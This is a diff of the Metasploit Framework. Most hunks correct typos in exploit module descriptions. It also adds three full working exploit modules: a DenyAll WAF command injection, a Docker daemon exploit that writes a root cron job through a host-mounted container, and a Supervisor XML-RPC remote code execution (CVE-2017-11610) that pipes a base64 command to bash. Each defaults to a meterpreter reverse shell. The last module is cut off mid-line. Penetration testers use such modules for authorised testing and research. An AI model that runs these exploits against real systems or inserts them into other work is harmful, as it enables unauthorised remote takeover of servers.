b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb index 1b5669ecb5..3b83207162 100644 --- a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE', 'Description' => %q{ - This module exploits an sql injection flaw in the MERGEWORKSPACE + This module exploits a sql injection flaw in the MERGEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability. }, diff --git a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb index 2b54b73c1b..1cb05aac04 100644 --- a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPACE', 'Description' => %q{ - This module exploits an sql injection flaw in the REMOVEWORKSPACE + This module exploits a sql injection flaw in the REMOVEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability. }, diff --git a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb index bf3d96fd12..4d1f238c7e 100644 --- a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection via SYS.LT.ROLLBACKWORKSPACE', 'Description' => %q{ - This module exploits an sql injection flaw in the ROLLBACKWORKSPACE + This module exploits a sql injection flaw in the ROLLBACKWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability. }, diff --git a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb index 1dc0c2fdea..90b9ba751c 100644 --- a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb +++ b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM), before version 10, doesn't implement access control properly, which allows remote attackers to modify user information. This module exploits the vulnerability to make - unauthorized speeddial entity manipulations. + unauthorized speed dial entity manipulations. }, 'Author' => 'fozavci', 'References' => diff --git a/modules/auxiliary/voip/sip_deregister.rb b/modules/auxiliary/voip/sip_deregister.rb index c993bb5bba..c5b2dc6fb2 100644 --- a/modules/auxiliary/voip/sip_deregister.rb +++ b/modules/auxiliary/voip/sip_deregister.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'SIP Deregister Extension', 'Description' => %q{ - This module will will attempt to deregister a SIP user from the provider. It + This module will attempt to deregister a SIP user from the provider. It has been tested successfully when the sip provider/server doesn't use REGISTER authentication. }, diff --git a/modules/encoders/cmd/printf_php_mq.rb b/modules/encoders/cmd/printf_php_mq.rb index 3bb28364da..8d48b0cc25 100644 --- a/modules/encoders/cmd/printf_php_mq.rb +++ b/modules/encoders/cmd/printf_php_mq.rb @@ -21,9 +21,9 @@ class MetasploitModule < Msf::Encoder 'Name' => 'printf(1) via PHP magic_quotes Utility Command Encoder', 'Description' => %q{ This encoder uses the printf(1) utility to avoid restricted - characters. Some shell variable substituion may also be used + characters. Some shell variable substitution may also be used if needed symbols are blacklisted. Some characters are intentionally - left unescaped since it is assummed that PHP with magic_quotes_gpc + left unescaped since it is assumed that PHP with magic_quotes_gpc enabled will escape them during request handling. }, 'Author' => 'jduck', diff --git a/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb b/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb index 7045d3b026..7a2b69561e 100644 --- a/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb +++ b/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Android Stagefright MP4 tx3g Integer Overflow", 'Description' => %q{ - This module exploits a integer overflow vulnerability in the Stagefright + This module exploits an integer overflow vulnerability in the Stagefright Library (libstagefright.so). The vulnerability occurs when parsing specially crafted MP4 files. While a wide variety of remote attack vectors exist, this particular exploit is designed to work within an HTML5 compliant browser. diff --git a/modules/exploits/android/local/futex_requeue.rb b/modules/exploits/android/local/futex_requeue.rb index 83a00695d6..2acd014f5e 100644 --- a/modules/exploits/android/local/futex_requeue.rb +++ b/modules/exploits/android/local/futex_requeue.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Local 'Name' => "Android 'Towelroot' Futex Requeue Kernel Exploit", 'Description' => %q{ This module exploits a bug in futex_requeue in the Linux kernel, using - similiar techniques employed by the towelroot exploit. Any Android device + similar techniques employed by the towelroot exploit. Any Android device with a kernel built before June 2014 is likely to be vulnerable. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/dialup/multi/login/manyargs.rb b/modules/exploits/dialup/multi/login/manyargs.rb index 30ddbf3b93..ed10140677 100644 --- a/modules/exploits/dialup/multi/login/manyargs.rb +++ b/modules/exploits/dialup/multi/login/manyargs.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'System V Derived /bin/login Extraneous Arguments Buffer Overflow', 'Description' => %q{ This exploit connects to a system's modem over dialup and exploits - a buffer overlflow vulnerability in it's System V derived /bin/login. + a buffer overflow vulnerability in it's System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments. }, 'References' => diff --git a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb index 0cbec9629b..e3d76631bf 100644 --- a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb +++ b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability', 'Description' => %q{ This module exploits a vulnerability in Adobe Flash Player for Linux, - version 10.0.12.36 and 9.0.151.0 and prior. + version 10.0.12.36 and 9.0.151.0 and prior. An input validation vulnerability allows command execution when the browser loads a SWF file which contains shell metacharacters in the arguments to the ActionScript launch method. diff --git a/modules/exploits/linux/ftp/proftp_telnet_iac.rb b/modules/exploits/linux/ftp/proftp_telnet_iac.rb index c829147f7a..2c71ce0a55 100644 --- a/modules/exploits/linux/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/linux/ftp/proftp_telnet_iac.rb @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote Although SSP significantly reduces the probability of a single attempt succeeding, it will not prevent exploitation. Since the daemon forks in a default configuration, the cookie value will remain the same despite - some attemtps failing. By making repeated requests, an attacker can eventually + some attempts failing. By making repeated requests, an attacker can eventually guess the cookie value and exploit the vulnerability. The cookie in Ubuntu has 24-bits of entropy. This reduces the effectiveness diff --git a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb index f4e3b707e5..04dfbc66a9 100644 --- a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb +++ b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the 'ping.sh' CGI - script, acessible through the Boa web server on Advantech switches. This module + script, accessible through the Boa web server on Advantech switches. This module was tested against firmware version 1322_D1.98. }, 'Author' => 'hdm', diff --git a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb index 39f37163e2..fbd10a7dbe 100644 --- a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb +++ b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise Communication Server 7.1 and earlier. The Unified Maintenance Tool contains a 'masterCGI' binary which allows an unauthenticated attacker - to execute arbitrary commands by specifing shell metacharaters as the + to execute arbitrary commands by specifying shell metacharaters as the 'user' within the 'ping' action to obtain 'httpd' user access. This module only supports command line payloads, as the httpd process kills the reverse/bind shell spawn after the HTTP 200 OK response. diff --git a/modules/exploits/linux/http/alienvault_exec.rb b/modules/exploits/linux/http/alienvault_exec.rb index edbc29e014..14ca6b3ad3 100644 --- a/modules/exploits/linux/http/alienvault_exec.rb +++ b/modules/exploits/linux/http/alienvault_exec.rb @@ -13,13 +13,13 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "AlienVault OSSIM/USM Remote Code Execution", 'Description' => %q{ - This module exploits object injection, authentication bypass and ip spoofing vulnerabities all together. + This module exploits object injection, authentication bypass and ip spoofing vulnerabilities all together. Unauthenticated users can execute arbitrary commands under the context of the root user. By abusing authentication bypass issue on gauge.php lead adversaries to exploit object injection vulnerability which leads to SQL injection attack that leaks an administrator session token. Attackers can create a rogue action and policy that enables to execute operating system commands by using captured session token. As a final step, - SSH login attempt with a invalid credentials can trigger a created rogue policy which triggers an action that executes + SSH login attempt with an invalid credentials can trigger a created rogue policy which triggers an action that executes operating system command with root user privileges. This module was tested against following product and versions: diff --git a/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb b/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb index cfcb36cfd7..37ffe7aa13 100644 --- a/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb +++ b/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote CryptoLog's login.php endpoint is responsible for the login process. One of the user supplied parameters is used by the application without input validation and parameter binding, which leads to SQL injection - vulnerability. Successfully exploitating this vulnerability gives a the valid session. + vulnerability. Successfully exploiting this vulnerability gives a valid session. CryptoLog's logshares_ajax.php endpoint is responsible for executing an operation system command. It's not possible to access this endpoint without having a valid session. One user parameter is used by the diff --git a/modules/exploits/linux/http/dcos_marathon.rb b/modules/exploits/linux/http/dcos_marathon.rb index 6b3c3893bd..c5ac9de55b 100644 --- a/modules/exploits/linux/http/dcos_marathon.rb +++ b/modules/exploits/linux/http/dcos_marathon.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote in the '/etc/cron.d/' path of the host server. *Notes: The docker image must be a valid docker image from - hub.docker.com. Further more the docker container will only + hub.docker.com. Furthermore the docker container will only deploy if there are resources available in the DC/OS cluster. }, 'Author' => 'Erik Daguerre', diff --git a/modules/exploits/linux/http/denyall_waf_exec.rb b/modules/exploits/linux/http/denyall_waf_exec.rb new file mode 100644 index 0000000000..469144d3d6 --- /dev/null +++ b/modules/exploits/linux/http/denyall_waf_exec.rb @@ -0,0 +1,103 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "DenyAll Web Application Firewall Remote Code Execution", + 'Description' => %q{ + This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a + terminal command under the context of the web server user. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/'] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 3001, + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [[ 'Automatic', { }]], + 'Privileged' => false, + 'DisclosureDate' => "Sep 19 2017", + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/']) + ] + ) + end + + def get_token + # Taking token by exploiting bug on first endpoint. + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'), + 'vars_get' => { + 'applianceUid' => 'LOCALUID', + 'typeOf' => 'debug' + } + }) + + if res && res.code == 200 && res.body.include?("iToken") + res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0] + else + nil + end + end + + def check + # If we've managed to get token, that means target is most likely vulnerable. + token = get_token + if token.nil? + Exploit::CheckCode::Safe + else + Exploit::CheckCode::Appears + end + end + + def exploit + # Get iToken from unauthenticated accessible endpoint + print_status('Extracting iToken value') + token = get_token + + if token.nil? + fail_with(Failure::NotVulnerable, "Target is not vulnerable.") + else + print_good("Awesome. iToken value = #{token}") + end + + # Accessing to the vulnerable second endpoint where we have command injection with valid iToken + print_status('Trigerring command injection vulnerability with iToken value.') + r = rand_text_alpha(5 + rand(3)); + + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'), + 'vars_post' => { + 'iToken' => token, + 'tag' => 'tunnel', + 'stime' => r, + 'type' => "#{r}$(python -c \"#{payload.encoded}\")" + } + }) + + end +end diff --git a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb index cd43f8d322..03b36f94d8 100644 --- a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'D-Link authentication.cgi Buffer Overflow', 'Description' => %q{ - This module exploits an remote buffer overflow vulnerability on several D-Link routers. + This module exploits a remote buffer overflow vulnerability on several D-Link routers. The vulnerability exists in the handling of HTTP queries to the authentication.cgi with long password values. The vulnerability can be exploitable without authentication. This module has been tested successfully on D-Link firmware DIR645A1_FW103B11. Other firmwares diff --git a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb index 3d11d81d46..f52e9b9ded 100644 --- a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'D-Link info.cgi POST Request Buffer Overflow', 'Description' => %q{ This module exploits an anonymous remote code execution vulnerability on different D-Link - devices. The vulnerability is an stack based buffer overflow in the my_cgi.cgi component, + devices. The vulnerability is a stack based buffer overflow in the my_cgi.cgi component, when handling specially crafted POST HTTP requests addresses to the /common/info.cgi handler. This module has been successfully tested on D-Link DSP-W215 in an emulated environment. diff --git a/modules/exploits/linux/http/dlink_hnap_bof.rb b/modules/exploits/linux/http/dlink_hnap_bof.rb index bb7dbfdea1..d405e08279 100644 --- a/modules/exploits/linux/http/dlink_hnap_bof.rb +++ b/modules/exploits/linux/http/dlink_hnap_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'D-Link HNAP Request Remote Buffer Overflow', 'Description' => %q{ This module exploits an anonymous remote code execution vulnerability on different - D-Link devices. The vulnerability is due to an stack based buffer overflow while + D-Link devices. The vulnerability is due to a stack based buffer overflow while handling malicious HTTP POST requests addressed to the HNAP handler. This module has been successfully tested on D-Link DIR-505 in an emulated environment. }, diff --git a/modules/exploits/linux/http/docker_daemon_tcp.rb b/modules/exploits/linux/http/docker_daemon_tcp.rb new file mode 100644 index 0000000000..c733b2440c --- /dev/null +++ b/modules/exploits/linux/http/docker_daemon_tcp.rb @@ -0,0 +1,207 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Docker Daemon - Unprotected TCP Socket Exploit', + 'Description' => %q{ + Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp + with tls but without tls-auth), an attacker can create a Docker + container with the '/' path mounted with read/write permissions on the + host server that is running the Docker container. As the Docker + container executes command as uid 0 it is honored by the host operating + system allowing the attacker to edit/create files owned by root. This + exploit abuses this to creates a cron job in the '/etc/cron.d/' path of + the host server. + + The Docker image should exist on the target system or be a valid image + from hub.docker.com. + }, + 'Author' => 'Martin Pizala', # started with dcos_marathon module from Erik Daguerre + 'License' => MSF_LICENSE, + 'References' => [ + ['URL', 'https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface'], + ['URL', 'https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket'] + ], + 'DisclosureDate' => 'Jul 25, 2017', + 'Targets' => [ + [ 'Python', { + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON, + 'Payload' => { + 'Compat' => { + 'ConnectionType' => 'reverse noconn none tunnel' + } + } + }] + ], + 'DefaultOptions' => { 'WfsDelay' => 180, 'Payload' => 'python/meterpreter/reverse_tcp' }, + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(2375), + OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]), + OptString.new('CONTAINER_ID', [ false, 'container id you would like']) + ] + ) + end + + def check_image(image_id) + vprint_status("Check if images exist on the target host") + res = send_request_raw( + 'method' => 'GET', + 'uri' => normalize_uri('images', 'json') + ) + return unless res and res.code == 200 and res.body.include? image_id + + res + end + + def pull_image(image_id) + print_status("Trying to pulling image from docker registry, this may take a while") + res = send_request_raw( + 'method' => 'POST', + 'uri' => normalize_uri('images', 'create?fromImage=' + image_id) + ) + return unless res.code == 200 + + res + end + + def make_container_id + return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil? + + rand_text_alpha_lower(8) + end + + def make_cmd(mnt_path, cron_path, payload_path) + vprint_status('Creating the docker container command') + echo_cron_path = mnt_path + cron_path + echo_payload_path = mnt_path + payload_path + + cron_command = "python #{payload_path}" + payload_data = payload.raw + + command = "echo \"#{payload_data}\" >> #{echo_payload_path} && " + command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} && " + command << "echo \"\" >> #{echo_cron_path} && " + command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}" + + command + end + + def make_container(mnt_path, cron_path, payload_path) + vprint_status('Setting container json request variables') + { + 'Image' => datastore['DOCKERIMAGE'], + 'Cmd' => make_cmd(mnt_path, cron_path, payload_path), + 'Entrypoint' => %w[/bin/sh -c], + 'HostConfig' => { + 'Binds' => [ + '/:' + mnt_path + ] + } + } + end + + def del_container(container_id) + send_request_raw( + { + 'method' => 'DELETE', + 'uri' => normalize_uri('containers', container_id) + }, + 1 # timeout + ) + end + + def check + res = send_request_raw( + 'method' => 'GET', + 'uri' => normalize_uri('containers', 'json'), + 'headers' => { 'Accept' => 'application/json' } + ) + + if res.nil? + print_error('Failed to connect to the target') + return Exploit::CheckCode::Unknown + end + + if res and res.code == 200 and res.headers['Server'].include? 'Docker' + return Exploit::CheckCode::Vulnerable + end + + Exploit::CheckCode::Safe + end + + def exploit + # check if target is vulnerable + unless check == Exploit::CheckCode::Vulnerable + fail_with(Failure::Unknown, 'Failed to connect to the target') + end + + # check if image is not available, pull it or fail out + image_id = datastore['DOCKERIMAGE'] + if check_image(image_id).nil? + fail_with(Failure::Unknown, 'Failed to pull the docker image') if pull_image(image_id).nil? + end + + # create required information to create json container information. + cron_path = '/etc/cron.d/' + rand_text_alpha(8) + payload_path = '/tmp/' + rand_text_alpha(8) + mnt_path = '/mnt/' + rand_text_alpha(8) + container_id = make_container_id + + # create container + res_create = send_request_raw( + 'method' => 'POST', + 'uri' => normalize_uri('containers', 'create?name=' + container_id), + 'headers' => { 'Content-Type' => 'application/json' }, + 'data' => make_container(mnt_path, cron_path, payload_path).to_json + ) + fail_with(Failure::Unknown, 'Failed to create the docker container') unless res_create && res_create.code == 201 + + print_status("The docker container is created, waiting for deploy") + register_files_for_cleanup(cron_path, payload_path) + + # start container + send_request_raw( + { + 'method' => 'POST', + 'uri' => normalize_uri('containers', container_id, 'start') + }, + 1 # timeout + ) + + # wait until container stopped + vprint_status("Waiting until the docker container stopped") + res_wait = send_request_raw( + 'method' => 'POST', + 'uri' => normalize_uri('containers', container_id, 'wait'), + 'headers' => { 'Accept' => 'application/json' } + ) + + # delete container + deleted_container = false + if res_wait.code == 200 + vprint_status("The docker container has been stopped, now trying to remove it") + del_container(container_id) + deleted_container = true + end + + # if container does not deploy, remove it and fail out + unless deleted_container + del_container(container_id) + fail_with(Failure::Unknown, "The docker container failed to deploy") + end + print_status('Waiting for the cron job to run, can take up to 60 seconds') + end +end diff --git a/modules/exploits/linux/http/gitlist_exec.rb b/modules/exploits/linux/http/gitlist_exec.rb index 4a104e38f4..f9c29fa017 100644 --- a/modules/exploits/linux/http/gitlist_exec.rb +++ b/modules/exploits/linux/http/gitlist_exec.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Gitlist Unauthenticated Remote Command Execution', 'Description' => %q{ This module exploits an unauthenticated remote command execution vulnerability - in version 0.4.0 of Gitlist. The problem exists in the handling of an specially + in version 0.4.0 of Gitlist. The problem exists in the handling of a specially crafted file name when trying to blame it. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/linux/http/linksys_apply_cgi.rb b/modules/exploits/linux/http/linksys_apply_cgi.rb index 2511f147de..f17e5a921c 100644 --- a/modules/exploits/linux/http/linksys_apply_cgi.rb +++ b/modules/exploits/linux/http/linksys_apply_cgi.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers. According to iDefense who discovered this vulnerability, all WRT54G versions prior to - 4.20.7 and all WRT54GS version prior to 1.05.2 may be be affected. + 4.20.7 and all WRT54GS version prior to 1.05.2 may be affected. }, 'Author' => [ 'Raphael Rigo ', 'Julien Tinnes ' ], 'License' => MSF_LICENSE, diff --git a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb index e980ec7f98..73e9f55953 100644 --- a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote their web interface where default credentials are admin/admin or admin/password. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload. This module has been tested on - a Linksys WRT160n version 2 - firmware version v2.0.03. A ping command against a + a Linksys WRT160n version 2 - firmware version v2.0.03. A ping command against a controlled system could be used for testing purposes. The exploit uses the tftp client from the device to stage to native payloads from the command injection. }, diff --git a/modules/exploits/linux/http/logsign_exec.rb b/modules/exploits/linux/http/logsign_exec.rb index 5feede5733..7be1da5a3f 100644 --- a/modules/exploits/linux/http/logsign_exec.rb +++ b/modules/exploits/linux/http/logsign_exec.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Logsign Remote Command Injection', 'Description' => %q{ - This module exploits an command injection vulnerability in Logsign. + This module exploits a command injection vulnerability in Logsign. By exploiting this vulnerability, unauthenticated users can execute arbitrary code under the root user. diff --git a/modules/exploits/linux/http/railo_cfml_rfi.rb b/modules/exploits/linux/http/railo_cfml_rfi.rb index 2757aaddcd..874e28a801 100644 --- a/modules/exploits/linux/http/railo_cfml_rfi.rb +++ b/modules/exploits/linux/http/railo_cfml_rfi.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => ' This module exploits a remote file include vulnerability in Railo, tested against version 4.2.1. First, a call using a vulnerable - line in thumbnail.cfm allows an atacker to download an + line in thumbnail.cfm allows an attacker to download an arbitrary PNG file. By appending a .cfm, and taking advantage of a directory traversal, an attacker can append cold fusion markup to the PNG file, and have it interpreted by the server. This is diff --git a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb index ca82667545..757d663377 100644 --- a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb +++ b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module takes advantage of two vulnerabilities in order to gain remote code execution as root as an otherwise non-privileged authorized user. By taking advantage of a mass assignment - vulnerability that allows an unprivileged authenticated user to change the admininistrator's + vulnerability that allows an unprivileged authenticated user to change the administrator's password hash, the module updates the password to login as the admin to reach the second vulnerability. No server-side sanitization is done on values passed when configuring a static network interface. This allows an administrator user to run arbitrary commands in the context of the web application, diff --git a/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb b/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb new file mode 100644 index 0000000000..3f28f6f321 --- /dev/null +++ b/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb @@ -0,0 +1,169 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info={}) + super(update_info(info, + 'Name' => "Supervisor XML-RPC Authenticated Remote Code Execution", + 'Description' => %q{ + This module exploits a vulnerability in the Supervisor process control software, where an authenticated client + can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. + The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this + may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been + configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Calum Hutton ' + ], + 'References' => + [ + ['URL', 'https://github.com/Supervisor/supervisor/issues/964'], + ['URL', 'https://www.debian.org/security/2017/dsa-3942'], + ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610'], + ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'], + ['CVE', '2017-11610'] + ], + 'Platform' => 'linux', + 'Targets' => + [ + ['3.0a1-3.3.2', {}] + ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'DefaultOptions' => + { + 'RPORT' => 9001, + 'Payload' => 'linux/x64/meterpreter/reverse_tcp', + }, + 'Privileged' => false, + 'DisclosureDate' => 'Jul 19 2017', + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(9001), + OptString.new('HttpUsername', [false, 'Username for HTTP basic auth']), + OptString.new('HttpPassword', [false, 'Password for HTTP basic auth']), + OptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']), + ] + ) + end + + def check_version(version) + if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1') + return true + else + return false + end + end + + def check + + print_status('Extracting version from web interface..') + + params = { + 'method' => 'GET', + 'uri' => normalize_uri('/') + } + if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty? + print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})") + params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])}) + end + res = send_request_cgi(params) + + if res + if res.code == 200 + match = res.body.match(/(\d+\.[\dab]\.\d+)<\/span>/) + if match + version = Gem::Version.new(match[1]) + if check_version(version) + print_good("Vulnerable version found: #{version}") + return Exploit::CheckCode::Appears + else + print_bad("Version #{version} is not vulnerable") + return Exploit::CheckCode::Safe + end + else + print_bad('Could not extract version number from web interface') + return Exploit::CheckCode::Unknown + end + elsif res.code == 401 + print_bad("Authentication failed: #{res.code} response") + return Exploit::CheckCode::Safe + else + print_bad("Unexpected HTTP code: #{res.code} response") + return Exploit::CheckCode::Unknown + end + else + print_bad('Error connecting to web interface') + return Exploit::CheckCode::Unknown + end + + end + + def execute_command(cmd, opts = {}) + + # XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server + # Credit to the following urls for the os.system() payload + # https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610 + # https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html + xml_payload = %{ + + supervisor.supervisord.options.warnings.linecache.os.system + + + echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&1 & + + +} + + # Send the XML-RPC payload via POST to the specified endpoint + endpoint_path = target_uri.path + print_status("Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}") + + params = { + 'method' => 'POST', + 'uri' => normalize_uri(endpoint_path), + 'ctype' => 'text/xml', + 'headers' => {'Accept' => 'text/xml'}, + 'data' => xml_payload, + 'encode_params' => false + } + if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty? + print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})") + params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], 